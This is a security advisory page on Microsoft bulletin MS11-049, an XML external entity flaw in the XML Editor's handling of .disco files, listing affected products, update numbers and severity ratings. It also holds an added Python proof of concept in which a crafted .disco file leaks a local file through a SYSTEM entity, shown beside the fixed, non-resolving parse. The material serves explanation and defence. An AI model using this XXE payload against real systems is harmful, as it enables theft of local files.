Microsoft has released a revision of a security advisory concerning software that uses the Microsoft XML Editor. The original advisory covered a fix for a security flaw that allowed attackers to gain access to sensitive data.
Package: Microsoft InfoPath 2010, Microsoft Office InfoPath 2007, Microsoft SQL Server 2005, Microsoft SQL Server 2008, Microsoft SQL Server 2008 R2, Microsoft Visual Studio 2005, Microsoft Visual Studio 2008, Microsoft Visual Studio 2010
Operating systems: Microsoft Windows XP, Microsoft Windows Server 2003, Microsoft Windows Vista, Microsoft Windows Server 2008, Microsoft Windows 7
Problem: improper resolution of external entities in XML (.disco) files
Exploitation: local/remote
Impact: disclosure of sensitive information
Solution: vendor software patch
CVE: CVE-2011-1280
Original advisory ID: MS11-049
Source: Microsoft
Problem:
The flaw stems from the way the XML Editor resolves external entities within Web Service Discovery (.disco) files. The revision was published to amend the list of affected systems.

Impact:
Attackers can exploit the flaw to gain access to sensitive data.

Solution:
An update that fixes the flaw has been released, and all users are advised to apply it.
Original advisory text
Microsoft Security Bulletin MS11-049 - Important
Vulnerability in the Microsoft XML Editor Could Allow Information Disclosure (2543893)
Published: June 14, 2011 | Updated: June 14, 2011
Version: 1.1
General Information
Executive Summary
This security update resolves a privately reported vulnerability in Microsoft XML Editor. The vulnerability could allow information disclosure if a user opened a specially crafted Web Service Discovery (.disco) file with one of the affected software listed in this bulletin. Note that this vulnerability would not allow an attacker to execute code or to elevate their user rights directly, but it could be used to produce information that could be used to try to further compromise the affected system.
This security update is rated Important for all supported editions of Microsoft InfoPath 2007 and Microsoft InfoPath 2010; all supported editions of SQL Server 2005, SQL Server 2008, and SQL Server 2008 R2; and all supported editions of Microsoft Visual Studio 2005, Microsoft Visual Studio 2008, and Microsoft Visual Studio 2010. For more information, see the subsection, Affected and Non-Affected Software, in this section.
The security update addresses the vulnerability by correcting the manner in which the XML Editor resolves external entities within a Web Service Discovery (.disco) file. For more information about the vulnerability, see the Frequently Asked Questions (FAQ) subsection for the specific vulnerability entry under the next section, Vulnerability Information.
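Neither the summary above nor the bulletin shows what "resolving external entities" in a .disco file actually does, so here is an added example (written for this page, not Microsoft's XML Editor code). It uses Python's standard-library SAX parser as a stand-in for the XML Editor: with external general entities enabled it fetches and inlines a local file named by the attacker's .disco document, which is the information-disclosure behaviour the bulletin describes; with them disabled (the behaviour the fix restores) the reference is left unresolved. The .disco document, the entity name `leak`, the `example.invalid` service URL, the `<comment>` element and the "secret" file are all constructed here.

```python
"""Added example (not Microsoft code): an XML External Entity (XXE) inside a
Web Service Discovery (.disco) document leaking a local file.

Python's xml.sax parser stands in for the XML Editor.  The only difference
between the "vulnerable" and the "fixed" parse is whether external general
entities are resolved.
"""
import io
import os
import pathlib
import tempfile
import xml.sax
from xml.sax import handler

# Constructed attacker-supplied .disco file.  The DOCTYPE declares an external
# entity pointing at a local file and references it in element content
# (external entities cannot appear in attribute values), so the file's bytes
# become part of the parsed document.  {uri} is filled in by demo().
DISCO_TEMPLATE = """<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE discovery [
  <!ENTITY leak SYSTEM "{uri}">
]>
<discovery xmlns="http://schemas.xmlsoap.org/disco/">
  <contractRef ref="http://example.invalid/Service.asmx?wsdl"
               docRef="http://example.invalid/Service.asmx"
               xmlns="http://schemas.xmlsoap.org/disco/scl/" />
  <comment>&leak;</comment>
</discovery>
"""


class TextCollector(handler.ContentHandler):
    """Collects every run of character data the parser delivers, including
    data that arrives from an expanded external entity."""

    def __init__(self):
        super().__init__()
        self.parts = []

    def characters(self, content):
        self.parts.append(content)

    def text(self):
        return "".join(self.parts)


def parse_disco(xml_bytes, resolve_external_entities):
    """Parse a .disco document and return all character data it produced.

    resolve_external_entities=True mirrors the pre-patch behaviour (external
    entities are fetched and inlined); False mirrors the fixed behaviour
    (external entity references are skipped).
    """
    parser = xml.sax.make_parser()
    collector = TextCollector()
    parser.setContentHandler(collector)
    # The security-relevant switch: whether SYSTEM "..." general entities are
    # fetched (file://, http://, ...) and expanded into the document.
    parser.setFeature(handler.feature_external_ges, resolve_external_entities)
    parser.parse(io.BytesIO(xml_bytes))
    return collector.text()


def demo():
    """Write a throw-away 'secret', parse the malicious .disco twice and
    return (text_with_resolution, text_without_resolution)."""
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as f:
        f.write("db_password=hunter2")  # constructed secret, not real data
        secret_path = f.name
    try:
        uri = pathlib.Path(secret_path).as_uri()  # e.g. file:///tmp/...
        doc = DISCO_TEMPLATE.format(uri=uri).encode("utf-8")
        leaked = parse_disco(doc, resolve_external_entities=True)
        safe = parse_disco(doc, resolve_external_entities=False)
        return leaked, safe
    finally:
        os.unlink(secret_path)


if __name__ == "__main__":
    leaked_text, safe_text = demo()
    print("external entities resolved    :", repr(leaked_text.strip()))
    print("external entities not resolved:", repr(safe_text.strip()))
```

The point to take from it: the file is read with the privileges of whoever opened the .disco document, and nothing in the document itself looks like code, which is why the bulletin rates this as information disclosure rather than code execution. Any XML consumer that accepts untrusted input should have external entity resolution switched off the way `parse_disco(..., False)` does.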
Recommendation. Microsoft recommends that customers apply the update at the earliest opportunity.
Known Issues. Microsoft Knowledge Base Article 2543893 documents the currently known issues that customers may experience when installing this security update. The article also documents recommended solutions for these issues.
Affected and Non-Affected Software
The following software has been tested to determine which versions or editions are affected. Other versions or editions are either past their support life cycle or are not affected. To determine the support life cycle for your software version or edition, visit Microsoft Support Lifecycle.
Microsoft Office Software
Software | Maximum Security Impact | Aggregate Severity Rating | Bulletins Replaced by this Update
Microsoft InfoPath 2007 Service Pack 2 (KB2510061) | Information Disclosure | Important | MS10-039
Microsoft InfoPath 2010 (32-bit editions) (KB2510065) | Information Disclosure | Important | None
Microsoft InfoPath 2010 (64-bit editions) (KB2510065) | Information Disclosure | Important | None
Microsoft SQL Server
Software | GDR Software Update | QFE Software Update | Maximum Security Impact | Aggregate Severity Rating | Bulletins Replaced by this Update
SQL Server 2005 Service Pack 3 | KB2494113 | KB2494112 | Information Disclosure | Important | MS09-062
SQL Server 2005 x64 Edition Service Pack 3 | KB2494113 | KB2494112 | Information Disclosure | Important | MS09-062
SQL Server 2005 for Itanium-based Systems Service Pack 3 | KB2494113 | KB2494112 | Information Disclosure | Important | MS09-062
SQL Server 2005 Service Pack 4 | KB2494120 | KB2494123 | Information Disclosure | Important | None
SQL Server 2005 x64 Edition Service Pack 4 | KB2494120 | KB2494123 | Information Disclosure | Important | None
SQL Server 2005 for Itanium-based Systems Service Pack 4 | KB2494120 | KB2494123 | Information Disclosure | Important | None
SQL Server 2005 Express Edition Service Pack 3 | KB2494113 | KB2494112 | Information Disclosure | Important | None
SQL Server 2005 Express Edition Service Pack 4 | KB2494120 | KB2494123 | Information Disclosure | Important | None
SQL Server 2005 Express Edition with Advanced Services Service Pack 3 | KB2494113 | KB2494112 | Information Disclosure | Important | None
SQL Server 2005 Express Edition with Advanced Services Service Pack 4 | KB2494120 | KB2494123 | Information Disclosure | Important | None
SQL Server Management Studio Express (SSMSE) 2005 | KB2546869 | Not applicable | Information Disclosure | Important | None
SQL Server Management Studio Express (SSMSE) 2005 x64 Edition | KB2546869 | Not applicable | Information Disclosure | Important | None
SQL Server 2008 for 32-bit Systems Service Pack 1 | KB2494096 | KB2494100 | Information Disclosure | Important | None
SQL Server 2008 for x64-based Systems Service Pack 1 | KB2494096 | KB2494100 | Information Disclosure | Important | None
SQL Server 2008 for Itanium-based Systems Service Pack 1 | KB2494096 | KB2494100 | Information Disclosure | Important | None
SQL Server 2008 for 32-bit Systems Service Pack 2 | KB2494089 | KB2494094 | Information Disclosure | Important | None
SQL Server 2008 for x64-based Systems Service Pack 2 | KB2494089 | KB2494094 | Information Disclosure | Important | None
SQL Server 2008 for Itanium-based Systems Service Pack 2 | KB2494089 | KB2494094 | Information Disclosure | Important | None
SQL Server 2008 R2 for 32-bit Systems | KB2494088 | KB2494086 | Information Disclosure | Important | None
SQL Server 2008 R2 for x64-based Systems | KB2494088 | KB2494086 | Information Disclosure | Important | None
SQL Server 2008 R2 for Itanium-based Systems | KB2494088 | KB2494086 | Information Disclosure | Important | None
Developer Tools
Software | Maximum Security Impact | Aggregate Severity Rating | Bulletins Replaced by this Update
Microsoft Visual Studio 2005 Service Pack 1 (KB2251481) | Information Disclosure | Important | None
Microsoft Visual Studio 2008 Service Pack 1 (KB2251487) | Information Disclosure | Important | None
Microsoft Visual Studio 2010 (KB2251489) | Information Disclosure | Important | None
Non-Affected Software
Software
Microsoft InfoPath 2003 Service Pack 2
Microsoft InfoPath 2003 Service Pack 3
Microsoft SQL Server 2000 Desktop Engine Service Pack 4
Microsoft SQL Server 2000 Itanium Edition Service Pack 4
Microsoft SQL Server 2000 Reporting Services Service Pack 2
Microsoft SQL Server 2000 Service Pack 4
Microsoft Visual Studio .NET 2003 Service Pack 1
Frequently Asked Questions (FAQ) Related to This Security Update
There are both GDR and QFE updates offered for my version of SQL. How do I know which update to use?
First, determine your SQL Server version number. For more information on determining your SQL Server version number, see Microsoft Knowledge Base Article 321185.
Second, in the table below, locate the version range that your SQL Server version number falls within. The corresponding update is the update you need to install.
Note If your SQL Server version number does not fall within any of the ranges in the table below, your SQL Server version is no longer supported. Please upgrade to the latest Service Pack or SQL Server product in order to apply this and future security updates.
For SQL Server 2005:
SQL Server Version Range | SQL Server Update
9.00.4035-9.00.4059 | SQL Server 2005 Service Pack 3 GDR (KB2494113)
9.00.4205-9.00.4339 | SQL Server 2005 Service Pack 3 QFE (KB2494112)
9.00.5000-9.00.5056 | SQL Server 2005 Service Pack 4 GDR (KB2494120)
9.00.5254-9.00.5291 | SQL Server 2005 Service Pack 4 QFE (KB2494123)
For SQL Server 2008:
SQL Server Version Range | SQL Server Update
10.00.2531-10.00.2572 | SQL Server 2008 Service Pack 1 GDR (KB2494096)
10.00.2710-10.00.2840 | SQL Server 2008 Service Pack 1 QFE (KB2494100)
10.00.4000-10.00.4063 | SQL Server 2008 Service Pack 2 GDR (KB2494089)
10.00.4260-10.00.4310 | SQL Server 2008 Service Pack 2 QFE (KB2494094)
For SQL Server 2008 R2:
SQL Server Version Range | SQL Server Update
10.50.1601.1-10.50.1616 | SQL Server 2008 R2 GDR (KB2494088)
10.50.1701-10.50.1789 | SQL Server 2008 R2 QFE (KB2494086)
For additional installation instructions, see the Security Update Information subsection for your SQL Server edition in the Update Information section.
Where are the file information details?
Refer to the reference tables in the Security Update Deployment section for the location of the file information details.
I am using an older release of the software discussed in this security bulletin. What should I do?
The affected software listed in this bulletin has been tested to determine which releases are affected. Other releases are past their support life cycle. For more information about the product lifecycle, visit the Microsoft Support Lifecycle Web site.
It should be a priority for customers who have older releases of the software to migrate to supported releases to prevent potential exposure to vulnerabilities. To determine the support lifecycle for your software release, see Select a Product for Lifecycle Information. For more information about service packs for these software releases, see Lifecycle Supported Service Packs.
Customers who require custom support for older software must contact their Microsoft account team representative, their Technical Account Manager, or the appropriate Microsoft partner representative for custom support options. Customers without an Alliance, Premier, or Authorized Contract can contact their local Microsoft sales office. For contact information, visit the Microsoft Worldwide Information Web site, select the country in the Contact Information list, and then click Go to see a list of telephone numbers. When you call, ask to speak with the local Premier Support sales manager. For more information, see the Microsoft Support Lifecycle Policy FAQ.
Vulnerability Information
Severity Ratings and Vulnerability Identifiers
The following severity ratings assume the potential maximum impact of the vulnerability. For information regarding the likelihood, within 30 days of this security bulletin's release, of the exploitability of the vulnerability in relation to its severity rating and security impact, please see the Exploitability Index in the June bulletin summary. For more information, see Microsoft Exploitability Index.
Vulnerability Severity Rating and Maximum Security Impact by Affected Software
Affected Software | XML External Entities Resolution Vulnerability - CVE-2011-1280 | Aggregate Severity Rating
Microsoft InfoPath
Microsoft InfoPath 2007 Service Pack 2 | Important (Information Disclosure) | Important
Microsoft InfoPath 2010 (32-bit editions) | Important (Information Disclosure) | Important
Microsoft InfoPath 2010 (64-bit editions) | Important (Information Disclosure) | Important
Microsoft SQL Server
SQL Server 2005 Service Pack 3 | Important (Information Disclosure) | Important
SQL Server 2005 x64 Edition Service Pack 3 | Important (Information Disclosure) | Important
SQL Server 2005 for Itanium-based Systems Service Pack 3 | Important (Information Disclosure) | Important
SQL Server 2005 Service Pack 4 | Important (Information Disclosure) | Important
SQL Server 2005 x64 Edition Service Pack 4 | Important (Information Disclosure) | Important
SQL Server 2005 for Itanium-based Systems Service Pack 4 | Important (Information Disclosure) | Important
SQL Server 2008 for 32-bit Systems Service Pack 1 | Important (Information Disclosure) | Important
SQL Server 2008 for x64-based Systems Service Pack 1 | Important (Information Disclosure) | Important
SQL Server 2008 for Itanium-based Systems Service Pack 1 | Important (Information Disclosure) | Important
SQL Server 2008 for 32-bit Systems Service Pack 2 | Important (Information Disclosure) | Important
SQL Server 2008 for x64-based Systems Service Pack 2 | Important (Information Disclosure) | Important
SQL Server 2008 for Itanium-based Systems Service Pack 2 | Important (Information Disclosure) | Important
SQL Server 2008 R2 for 32-bit Systems | Important (Information Disclosure) | Important
SQL Server 2008 R2 for x64-based Systems | Important (Information Disclosure) | Important
SQL Server 2008 R2 for Itanium-based Systems | Important (Information Disclosure) | Important
SQL Server 2005 Express Edition Service Pack 3 | Important (Information Disclosure) | Important
SQL Server 2005 Express Edition Service Pack 4 | Important (Information Disclosure) | Important
SQL Server 2005 Express Edition with Advanced Services Service Pack 3 | Important (Information Disclosure) | Important
SQL Server 2005 Express Edition with Advanced Services Service Pack 4 | Important (Information Disclosure) | Important
SQL Server Management Studio Express (SSMSE) 2005 | Important (Information Disclosure) | Important
SQL Server Management Studio Express (SSMSE) 2005 x64 Edition | Important (Information Disclosure) | Important
Microsoft Visual Studio
Microsoft Visual Studio 2005 Service Pack 1 | Important (Information Disclosure) | Important
Microsoft Visual Studio 2008 Service Pack 1 | Important (Information Disclosure) | Important
Microsoft Visual Studio 2010 | Important (Information Disclosure) | Important
XML External Entities Resolution Vulnerability - CVE-2011-1280
An information disclosure vulnerability exists in the way that Microsoft XML Editor handles specially crafted XML files.
To view this vulnerability as a standard entry in the Common Vulnerabilities and Exposures list, see CVE-2011-1280.
Mitigating Factors for XML External Entities Resolution Vulnerability - CVE-2011-1280
Mitigation refers to a setting, common configuration, or general best-practice, existing in a default state, that could reduce the severity of exploitation of a vulnerability. The following mitigating factors may be helpful in your situation: